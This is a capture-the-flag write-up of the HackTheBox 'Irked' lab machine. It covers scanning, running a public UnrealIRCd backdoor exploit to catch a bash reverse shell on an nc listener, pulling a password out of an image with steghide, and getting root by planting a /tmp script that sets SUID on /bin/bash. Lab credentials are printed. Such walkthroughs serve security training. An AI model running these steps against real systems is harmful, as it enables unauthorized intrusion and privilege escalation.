# Irked

Irked is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/163), created by Creator MrAgent. In the current post, my IP is 10.10.14.27, and the target IP is 10.129.124.47.

This machine is straightforward. It follows the basic steps for enumeration and exploitation, with some research included.

### Gathering Information

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FXBrqpo9J170ejDmuwSqX%2Fimage.png?alt=media&#x26;token=9e9dba3e-0c82-4088-b4b6-e4a935475f86" alt=""><figcaption><p>There is a website, and a lot of ports related to IRC (Internet Relay Chat), we need to get details.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -sCV -p 22,80,111,6697,8067,34716,65534 10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FWvDjszJQJhCRLB7HD6g7%2Fimage.png?alt=media&#x26;token=377b41bb-7525-4b0b-a824-9e1cea1ff852" alt=""><figcaption><p>Definitely there is an IRC working, those are a communication protocol in real time that we can exploit.</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
whatweb -v http://10.129.124.47
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FeDaX3xKQM0yWHup5nlJv%2Fimage.png?alt=media&#x26;token=f06eb2d5-7c41-4ec8-b88d-796af1ecdc59" alt=""><figcaption><p>Nothing relevant</p></figcaption></figure>

* Browser:         [http://10.129.124.47](http://10.129.124.47/)

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FFM66dwF9p8zn1LmcK0Ck%2Fimage.png?alt=media&#x26;token=2ae0768f-df3f-40d0-b457-b819c756fed6" alt=""><figcaption><p>Source code of the target website</p></figcaption></figure>

We have limited information, but that phrase is enough, at this point our best option is to search about **Unrealircd Exploit,** you will find [this at GitHub.](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor)

### Weaponization and Exploitation

{% code title="Local Terminal" %}

```bash
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor 
cd UnrealIRCd-3.2.8.1-Backdoor/
batcat exploit.py
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FxeziWmCLWB0CkmQXf0j7%2Fimage.png?alt=media&#x26;token=acf7ab61-9da2-4aaf-b8fa-0202592fb02b" alt=""><figcaption></figcaption></figure>

There is some stuff to change, add the information of your own machine there (Here: 10.10.14.27 // 443), if you continue the analysis, you will find a lot of payloads from an argument, we will use bash.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FY59rKT7ltFQaOrxQ4C9f%2Fimage.png?alt=media&#x26;token=33d3c502-da29-4426-9dc3-b0b1988ecd34" alt=""><figcaption><p>List of payloads</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FUb9gL01gmrcbRFmILFxl%2Fimage.png?alt=media&#x26;token=48de3d2f-8b89-44b1-9829-d808d4ac9129" alt=""><figcaption><p>How to use exploit.py</p></figcaption></figure>

Here we need to open a new terminal listening using the port 443.

{% code title="Local Terminal \[B]" %}

```bash
nc -nlvp 443
```

{% endcode %}

{% code title="Local Terminal \[A]" %}

```bash
python3 exploit.py 10.129.124.47 6697 -payload bash
```

{% endcode %}

We are using the target port 6697 because the IRC is there. After executing, a message “Exploit sent successfully” will appear, and your second **local terminal \[B]** will be connected to the target, this will be called **\[IRCD]**. Now we will start with some [TTY treatment](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade).

{% code title="Target Terminal \[IRCD]" %}

```bash
cd /
find \-name user.txt 2>/dev/null
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FJPOiEKGaByPHY4k9ZIBx%2Fimage.png?alt=media&#x26;token=607819af-173e-4d8c-8f84-b2a6e27de53d" alt=""><figcaption></figcaption></figure>

After exploring a little bit, at /home/djmardov/Documents there is a backup hidden file, let’s see with cat and check what we can find.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FFVI74JJ9RB4ZXwdEid7J%2Fimage.png?alt=media&#x26;token=36dee1a5-9c34-4c3a-a0b5-7b0212ddb6ba" alt=""><figcaption><p>Backup hidden file</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FpCCX0gvYKOEWBwpt3X6K%2Fimage.png?alt=media&#x26;token=d6371938-0d64-4c4f-93c6-35a315641c23" alt=""><figcaption><p>Content of .backup</p></figcaption></figure>

Here we have two things: a clue about Steganography, maybe the image at the URL, and a password, probably related to the Steganography step. Now download the image from [http://10.129.124.47](http://10.129.124.47/), the angry face, and open a local terminal.

{% code title="Local Terminal" %}

```bash
exitftool irked.jpg
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F9Ggr70EkC9iYpTO6T01f%2Fimage.png?alt=media&#x26;token=985ef50c-12d7-4c0c-ad21-a57a518fc184" alt=""><figcaption><p>Nothing weird</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
strings irked.jpg
steghide extract -sf irked.jpg              # Without password, it fails.
steghide extract -sf irked.jpg              # pass: UPupDOWNdownLRlrBAbaSSss
cat pass.txt
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FGHGgklNUatdHAsQaQotZ%2Fimage.png?alt=media&#x26;token=4a71cad1-efa3-4405-91b5-947b2c7fe396" alt=""><figcaption><p>New password!</p></figcaption></figure>

By using Steghide, we extract a new password “Kab6h+m+bbp2J:HG”, we can try to use it at IRCD to change our user.

{% code title="Target Terminal \[IRCD]" %}

```bash
su djmardov                            #Pass: Kab6h+m+bbp2J:HG
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FWXlOCa7UY2suQ85UTn77%2Fimage.png?alt=media&#x26;token=1dc769b6-10df-4167-a7f4-13916138fa90" alt=""><figcaption></figcaption></figure>

It works, now we are Djmardov and we can read the flag at /home/djmardov/Documents/user.txt

### Privileges Scalation

{% code title="Target Terminal \[Djmardov]" %}

```bash
cd /
find \-perm -4000 2>/dev/null
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FS6aSarzS9Oyn3k8rNTIW%2Fimage.png?alt=media&#x26;token=5873ee22-0616-48e8-9c09-e6ebe9eb4eee" alt=""><figcaption><p>It looks like a custom command</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
/usr/bin/viewuser
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FL7SQgIgOG5CJBnbfYPby%2Fimage.png?alt=media&#x26;token=12da747b-64f5-4aa4-be51-03ca788842e9" alt=""><figcaption><p>A beta for a command to work with permissions?</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
strings /usr/bin/viewuser
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FDi8AHO1UvYEWr90i1SmL%2Fimage.png?alt=media&#x26;token=32ce8ed1-8be9-436b-854a-f0530520b3df" alt=""><figcaption><p>By using Strings, we can see that needs the file /tmp/listusers</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FF0W9joL8yUJzCO8v7ixU%2Fimage.png?alt=media&#x26;token=b10c17ea-8989-4ddc-ba81-5527d1221d51" alt=""><figcaption><p>But it doesn’t even exists</p></figcaption></figure>

We don’t lose if we try to create that file and put a command inside it.

{% code title="Target Terminal \[Djmardov]" %}

```bash
touch /tmp/listusers
chmod +x /tmp/listusers
nano /tmp/listusers
```

{% endcode %}

{% code title="Content of /tmp/listusers" %}

```bash
#!/bin/bash

chmod u+s /bin/bash
```

{% endcode %}

{% code title="Target Terminal \[Djmardov]" %}

```bash
ls -l /bin/bash
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FIwueUipiyKG94IYqQcMi%2Fimage.png?alt=media&#x26;token=68523c6d-d24b-4871-9cce-4ea7c13cd650" alt=""><figcaption><p>Looks like now we can use it, it works!</p></figcaption></figure>

{% code title="Target Terminal \[Djmardov]" %}

```bash
bash -p
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
cat /root/root.txt
```

{% endcode %}